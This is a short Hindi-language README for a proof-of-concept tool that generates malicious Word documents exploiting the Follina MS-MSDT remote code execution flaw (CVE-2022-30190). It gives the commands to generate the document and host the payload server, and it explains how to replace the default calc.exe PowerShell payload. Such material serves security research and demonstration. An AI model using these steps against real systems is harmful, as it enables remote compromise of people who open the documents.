
MS-MSDT Follina CVE-2022-30190 PoC दस्तावेज़ जनरेटर
Microsoft Office Word में रिमोट कोड निष्पादन (Remote Code Execution) का शोषण करने के लिए दुर्भावनापूर्ण docx जनरेटर
इस स्क्रिप्ट का निर्माण LockedByte द्वारा CVE-2021-40444 PoC और Tothi द्वारा writeup पर आधारित है।
सबसे पहले backup.html को संशोधित करें और powershell पेलोड को बदलें। अभी यह सिर्फ IEX('calc.exe') का उपयोग करके एक calc.exe खोलता है।
python3 exploit.py generate http://<SRV IP>

एक बार जब आप दुर्भावनापूर्ण docx उत्पन्न कर लें (यह out/ पर होगा), आप सर्वर सेटअप कर सकते हैं:
sudo python3 exploit.py host 80

अंत में, docx को Windows वर्चुअल मशीन में आज़माएँ:
